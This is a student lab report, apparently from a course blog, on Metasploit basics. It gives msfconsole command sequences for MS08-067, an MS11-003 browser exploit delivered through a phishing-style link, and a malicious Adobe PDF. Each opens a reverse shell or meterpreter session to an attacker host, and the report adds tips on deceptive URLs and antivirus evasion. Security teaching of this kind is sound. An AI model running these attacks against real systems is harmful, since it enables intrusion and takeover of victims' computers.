Exp5MSF基础应用——20164325王晓蕊
1.实验要求
一个主动攻击实践,ms08_067;
一个针对浏览器的攻击,MS11-003(唯一);
一个针对客户端的攻击,adobe_toolbutton;
成功应用任何一个辅助模块Ipidseq(唯一)。
2.实验过程
2.1一个主动攻击实践,ms08_067
2.1.1在攻击机kali输入msfconsole进入控制台,依次输入以下指令:
use exploit/windows/smb/ms08_067_netapi
show payloads
set payload generic/shell_reverse_tcp //tcp反向回连
set LHOST 192.168.23.128 //攻击机ip
set LPORT //攻击端口
set RHOST 192.168.23.131 //靶机ip
set target //自动选择目标系统类型,匹配度较高
exploit //攻击
2.1.2出现的问题:
1.一开始我是用了windows xp中文版的试了一下,结果就如下:
(无法创建会话界面)
这个原因就是因为windows xp中文版打了补丁,只能用别的版本。
2.如果出现以下问题:
就要检查以下靶机的防火墙有没有关掉,而且把链接调到桥接模式也很有必要。
2.2一个针对浏览器的攻击,MS11-003(唯一)
这个漏洞是在 /usr/share/metasploit-framework/modules/exploits/windows/browser 目录下找到的,就紧挨着MS11-050
2.2.1配置
1 msfconsole
2 use exploit/windows/browser/ms11_003_ie_css_import//使用针对ms11_003的渗透攻击模块
3 set PAYLOAD windows/meterpreter/reverse_tcp//设置载荷为TCP反向回连
4 set URIPATH (和20164325c)//设置URLPATH,就是跟在ip地址后面的页面的名称,内容可以随便写,比如说写成baidu.com将更具有迷惑性
5 set LHOST 192.168.23.128//设置本地主机地址
6 set LPORT //设置本地主机端口,只要是大于1024的都可以
7 set SRVPORT //设置钓鱼网站链接的假端口号,写成80也可以,写成443也行
8 set SRVHOST 192.168.23.128//钓鱼网站的地址要和本地主机地址保持一致
9 exploit
之后会生成一个钓鱼网站的链接,把这个链接到靶机上。
2.2.2对WinXP平台上的IE8进行攻击
本地主机显示连接没有问题,但是一直卡在传输css上面,而远程主机是显示完毕没有任何提示消息,也就是这个网站没有成功。然后我就再换个虚拟机进行攻击。
2.2.3对Win7平台上的IE8进行攻击
1.看到 successfully migrated to expolore.exe就说明成功建立会话了
2. sessions显示当前建立起的会话
3. sessions -i n 进入某一个会话,建议n值取会话id最大的那一个的值,只不过我这里就如图所示只有1
2.3一个针对客户端的攻击,adobe_toolbutton
2.3.1在msf下用search
2.3.2依次输入以下指令:
use windows/fileformat/adobe_cooltype_sing
set payload windows/meterpreter/reverse_tcp //tcp反向回连
set LHOST 192.168.23.128 //攻击机ip
set LPORT //攻击端口
set FILENAME exp5_4325.pdf //设置生成pdf文件的名字
exploit //攻击
生成pdf:
2.3.3 将pdf文件传送或拷贝到靶机上(先把文件传到自己的电脑上,然后再复制到靶机上),在kali上输入back退出当前模块,进入监听模块,输入以下命令:
use exploit/multi/handler //进入监听模块
set payload windows/meterpreter/reverse_tcp //tcp反向连接
set LHOST 192.168.23.128//攻击机ip
set LPORT //攻击端口固定
exploit
4. 然后在靶机上打开20164325.pdf文件,运行后,回连成功。
5. 运行ipconfig命令
2.4成功应用任何一个辅助模块Ipidseq(唯一)
功能:扫描网段中的存活ip,它会识别被发现主机的IPID(用于跟踪IP包的次序的一种技术)序列模式,并且表示出哪些是0、随机或递增的。
拥有递增的IPID的空闲(空闲是指该主机在特定时间内不向网络发送数据包)主机(即显示为Incremental!的条目),不会被网络上的其它主机严重影响,可以用来进行TCP空闲扫描。
TCP空闲扫描:是一种高级的nmap扫描方式,这种扫描方式能让我们冒充网络上另一台主机的IP地址对目标进行更为隐秘的扫描。
2.4.1 use auxiliary/scanner/ip/ipidseq 查看需要设置的参数,设置完成后确认一下,然后就可以开始exploit了。
2.4.2设为对单一目标主机的扫描
2.4.3对指定网段的主机进行扫描:
3.基础问题回答
(1)用自己的话解释什么是exploit,payload,encode.
exploit:英文意思就是利用,就相当于是载具,使用者利用漏洞进行攻击的一个过程,将要负责攻击的代码传送到靶机中。
payload:载荷,相当于之前实验的后门,负责执行相应的攻击代码。
encode:shellcode的变形,用来编码、伪装,不让杀毒软件很轻易的就发现payload是攻击代码。
(2)离实战还缺些什么技术或步骤?
目前都只是针对XP系统进行攻击,而且现在学习的东西还只是最基础、最简单的,而且还是对已经发现的漏洞做攻击,所以说我觉得离实战还差一大截呢;所以还不能直接对现在的操作系统进行攻击,但是攻击原理应该是相同的。
4.实验总结
这次实验的过程我觉得还是很顺利的,就是在第一个部分的时候会有小问题;这次实验让我学会了msf的一些功能,我发现学无止境,还是要努力钻研;还有一点就是漏洞真的太多了,对于这方面我们也要注意。
Exp5MSF基础应用——20164325王晓蕊的更多相关文章
- Exp3 免杀原理与实践 ——20164325王晓蕊
一.实践基本内容 1.实践目标 (1) 正确使用msf编码器(√),msfvenom生成如jar之类的其他文件(√),veil-evasion(√),加壳工具(√),使用shellcode编程(√) ...
- Exp2 后门原理与实践-------20164325王晓蕊
Exp2 后门原理与实践 任务一:使用netcat获取主机操作Shell,cron启动 1.windows获取linux shell 1.1 ipconfig 查看本机查看以太网适配器(8)的ipv ...
- Exp6 信息搜集与漏洞扫描——20164325王晓蕊
1.实践目标 掌握信息搜集的最基础技能与常用工具的使用方法. 2.实践内容 2.1 各种搜索技巧的应用 2.1.1 Netcraft查询 Netcraft这个网站可以查询到特定网站的IP地址,以wei ...
- Exp4 恶意代码分析 ——20164325王晓蕊
1.实践目标 监控你自己系统的运行状态,看有没有可疑的程序在运行. 分析一个恶意软件,就分析Exp2或Exp3中生成后门软件:分析工具尽量使用原生指令或sysinternals,systracer套件 ...
- Exp1 PC平台逆向破解----20164325 王晓蕊
前言:实验中用到的知识 JE:条件转移指令,如果相等则跳转: JNE:条件转移指令(等同于“Jump Not Equal”),如果不相等则跳转: JMP:无条件跳转指令.无条件跳转指令可转到内存中任何 ...
- 20145202马超《网络对抗》Exp5MSF基础应用
20145202马超<网络对抗>Exp5MSF基础应用 本实践目标,掌握metasploit的基本应用方式,掌握常用的三种攻击方式的思路.具体需要完成(1)一个主动攻击,如ms08_067 ...
- JavaScript脚本语言基础(四)
导读: JavaScript和DOM DOM文档对象常用方法和属性 DOW文档对象运用 JSON数据交换格式 正则表达式 1.JavaScript和DOM [返回] 文档对象模型(Document O ...
- 面向对象多继承(c3算法)、网络基础和编写网络相关的程序
一.面向对象多继承(c3算法) a.有多个父类先找左,再找右,如下示例: class A(object): pass class B(object): def f1(self): print('B') ...
- Daily target小队介绍(刘畅,陈杰,杨有存,唐祎琳,王晓哲,邵汝佳)
一.团队介绍 1.团队构成: 2.队名: Daily target,我们的口号是Target your day! 3.团队项目描述: 我们计划写一个用于老师发布任务,学生接受任务的安卓app.教师安排 ...
随机推荐
- 解决Oracle数据库空间不足问题
//查询表空间的大小以及文件路径地址select tablespace_name, file_id, file_name,round(bytes/(1024*1024),0) total_space ...
- Servle第四篇(会话技术之cookie)
会话技术 什么是会话技术 基本概念: 指用户开一个浏览器,访问一个网站,只要不关闭该浏览器,不管该用户点击多少个超链接,访问多少资源,直到用户关闭浏览器,整个这个过程我们称为一次会话. 为什么我们要使 ...
- JVM学习01:内存结构
JVM学习01:内存结构 写在前面:本系列分享主要参考资料是 周志明老师的<深入理解Java虚拟机>第二版. 内存结构知识要点Xmind梳理 案例分析 分析1 package com.h ...
- python-django(框架结构)
项目架构: 最外层myshop目录:项目的容器,没有实质性的作用 .idea:项目的配置信息.这个文件夹是自动生成,版本控制信息等,包括历史记录.无用 manage.py:(管理项目)一个实用的命令行 ...
- JAVA常用注解
摘自:https://www.cnblogs.com/guobm/p/10611900.html 摘要:java引入注解后,编码节省了很多需要写代码的时间,而且精简了代码,本文主要罗列项目中常用注解. ...
- 原生js简单轮播图 代码
在团队带人,突然被人问到轮播图如何实现,进入前端领域有一年多了,但很久没自己写过,一直是用大牛写的插件,今天就写个简单的适合入门者学习的小教程.当然,轮播图的实现原理与设计模式有很多种,我这里讲的是用 ...
- oracle redo日志文件损坏恢复
参考:How to Recover from Loss Of Online Redo Log And ORA-312 And ORA-313 (Doc ID 117481.1) 在线重做日志文件丢失后 ...
- Linux permission denied问题
初试Linux 本来想试一试递归的mkdir -p结果遇到了permission denied,但是自己明明是管理员啊 查了博客,在文件名前加上chmod 777 ,例如chmod 777 temp ...
- Codeforces 1083B The Fair Nut and Strings
Description 给定两个由 \('a'\), \('b'\) 组成的字符串 \(a\), \(b\),以及两个整数 \(n\) 和 \(k\) \(n\) 表示字符串 \(a\),\(b\) ...
- EasyPR源码剖析(5):车牌定位之偏斜扭转
一.简介 通过颜色定位和Sobel算子定位可以计算出一个个的矩形区域,这些区域都是潜在车牌区域,但是在进行SVM判别是否是车牌之前,还需要进行一定的处理.主要是考虑到以下几个问题: 1.定位区域存在一 ...